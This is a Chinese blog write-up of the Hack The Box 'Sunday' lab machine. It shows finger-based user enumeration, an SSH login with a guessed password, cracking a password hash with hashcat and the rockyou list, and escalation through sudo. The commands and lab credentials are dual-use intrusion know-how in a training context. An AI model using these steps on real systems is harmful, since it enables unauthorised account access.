【Hack The Box】linux练习-- Sunday

最新推荐文章于 2024-10-14 16:42:33 发布
最新推荐文章于 2024-10-14 16:42:33 发布
阅读量477 收藏 1
点赞数
分类专栏: Hack The Box 文章标签: linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127796188
版权

HTB 学习笔记

【Hack The Box】linux练习-- Sunday

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

79/tcp    open  finger    Sun Solaris fingerd
| finger: Login       Name               TTY         Idle    When    Where\x0D
| sunny    sunny                 pts/1            Thu 14:52  10.10.14.245        \x0D
| sunny    sunny                 pts/2          4 Thu 13:55  10.10.15.182        \x0D
| sunny    sunny                 pts/4          2 Thu 13:55  10.10.16.94         \x0D
| sunny    sunny                 pts/5          8 Thu 14:52  10.10.15.42         \x0D
| sunny    sunny                 pts/6         21 Thu 14:14  10.10.14.120        \x0D
| sunny    sunny                 pts/7          2 Thu 14:32  10.10.15.138        \x0D
| sunny    sunny                 pts/8         49 Thu 14:20  10.10.15.167        \x0D
| sunny    sunny                 pts/9          9 Thu 14:28  10.10.14.122        \x0D
| sammy    sammy                 pts/10           Thu 15:07  10.10.14.78         \x0D
| sunny    sunny                 pts/11         1 Thu 15:06  10.10.16.73         \x0D
| sammy    sammy                 pts/12         4 Thu 14:44  10.10.15.38         \x0D
| sammy    sammy                 pts/13           Thu 15:10  10.10.15.182        \x0D
|_sammy    sammy                 pts/14         1 Thu 15:06  10.10.15.213        \x0D
111/tcp   open  rpcbind   2-4 (RPC #100000)
22022/tcp open  ssh       SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
65258/tcp open  smserverd 1 (RPC #100155)
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

65258/tcp open smserverd
22022/tcp open ssh
111的 rpc
79/tcp open finger Sun Solaris fingerd

finger

pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz

./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.129.16.126

发现两个用户

sammy
sunny

ssh -p 22022 sunny@10.129.16.126
密码作为:sunday有效
在这里插入图片描述发现,打开查看
在这里插入图片描述然后去hashcat官网查看是什么加密格式,知道是7400
在这里插入图片描述

hashcat -m 7400 sunday.hashes /usr/share/wordlists/rockyou.txt --force

在这里插入图片描述

得到密码:cooldude!

sudo -l
在这里插入图片描述
直接sudo su

人间体佐菲
关注
专栏目录
0x06 HackTheBox系列之 sunday实战
boss111的专栏
05-07 393
一 实验简介 目标IP:10.129.222.164 针对79端口破解 ​ ┌──(root💀kali)-[~/hackthebox/htb_tools/finger-user-enum-1.0] └─# ./finger-user-enum.pl -U /usr/share/SecLists/Usernames/Names/names.txt -t 10.129.222.164 Starting finger-user-enum v1.0 ( http://pentestmonkey.net/to
hackthebox-sunday(考点;finger/破解枚举/linux wget提权)
冬萍子癸水
04-13 816
这是个SunOS,但其实渗透思路和linux一样 nmap 看到没有80,那基本就不是web层面,而要从端口突破了 首先是79的finger 从里面找存在的用户信息。 于是我用kali自带的字典,以及这个工具。他的网站似乎有时会打不开 perl finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10...
HackTheBox::Sunday
aya3t的博客
10-11 141
HackTheBox::Sunday
Hack the box靶机 Sunday
菜浪马废的博客
05-21 380
心烦!!! 单身的时候一个人过情人节!!! 不单身了还一个人过情人节!!! 继续学! 我需要的是知识! 我需要女朋友么?! 开玩笑! 两个账号
Linux/Sunday
ve9etable的博客
12-16 715
Hack The Boxlinux练习-- SolidState
人间体佐菲的博客
11-09 552
Hack The Boxlinux练习-- SolidState
Hack The Boxlinux练习-- Nineveh
人间体佐菲的博客
11-09 849
Hack The Boxlinux练习-- Nineveh
HackTheBox-BoardLight-WP
2201_75526400的博客
05-29 875
查看下 80 端口先,发现直接 200 ,返回了前端代码(一般会是302 然后给出域名信息的说)
Hack The BoxLinux练习-- Luanne
人间体佐菲的博客
11-27 743
Hack The BoxLinux练习-- Luanne
Hack The Boxlinux练习-- SwagShop
人间体佐菲的博客
11-21 334
Hack The Boxlinux练习-- SwagShop
Stego-Challenges-HackTheBox-Write-Ups:Hack The Box带来的Stego挑战| Walkthoughs写ups
03-21
在IT安全领域,尤其是黑客挑战平台如Hack The Box(HTB)中,"Stego"是一种常见的挑战类型,它涉及到隐藏信息的技术,通常被称为隐写术。隐写术是一种利用图像、音频、文本等载体秘密传输信息的方法。在这个特定的...
HackTheBox-CTF-Writeups:此备忘单旨在面向CTF玩家和初学者,以帮助他们根据操作系统和难度对Hack The Box Labs进行分类
05-06
HackTheBox CTF速查表 该备忘单面向CTF玩家和初学者,可帮助他们根据操作系统和难度对Hack The Box Labs进行分类。 此列表包含hackingarticles上所有可用的Hack The Box文章。 我们已经根据我们的经验执行并编制了此...
Hackthebox e Vulnhub - Dicas e Truques.pdf
10-06
在这个领域,两个知名的在线平台是Hackthebox和Vulnhub,它们提供虚拟环境供用户实践和提升渗透测试技能。这份PDF文档作者Joas Antonio分享了一些初学者在接触这些平台时可能会发现有用的技巧和策略。 首先,对于...
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现...
Linux 命令:每日一学,一文说尽打包压缩工具实践
WeiyiGeek 唯一极客IT知识分享
10-12 761
[知识是人生的灯塔,只有不断学习,才能照亮前行的道路]文章目录:0x00 前言简述前面,我们介绍了Linux中文件查找find命令以及与之联用最勤的xargs命令,作者以一个个简单的实例给各位看友展示了在运维中两个命令的使用技巧,今天我们再来介绍一些打包、压缩解压等相关命令。在 Linux 系统中,我们经常需要使用到压缩和解压文件,使用压缩文件可以减少文件大小,从而减少存储空间,以及在网络传输...
Linux】解读信号的本质&相关函数及指令的介绍
YYDsis的博客
10-14 724
一.信号的本质与相关概念1.体现中断的例子:.系统定义的信号列表1.用kill -l命令可以察看系统定义的信号列表2.(ps&kill&raise&abort)进程指令&信号相关函数【总结】【1】ps指令【2】kill&raise函数介绍与演示【3】abort函数介绍与演示三.产生信号的四种方式1.通过终端按键产生信号(Core Dump)2.调用系统函数向进程发信号3.由软件条件产生信号4.硬件异常产生信号
Linux】ioctl分析
最新发布
目标:MVP
10-14 1047
一个字符设备驱动通常会实现常规的openreleaseread和write接口,但是如果需要扩展新的功能,通常以ioctl接口的方式实现。fill:#333;user spacevfsdriverioctl()ulocked_ioctl()或compat_ioctl()user spacevfsdriver。
Linux动静态库
2301_76197086的博客
10-13 1051
详解Linux系统中的动静态库生成和使用,以及可执行程序运行时与动态库进行动态链接的原理
linux手册翻译 nm
sunqin的博客
10-13 973
nm - 从目标文件中列出符号。
hackthebox - reel
11-03
HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值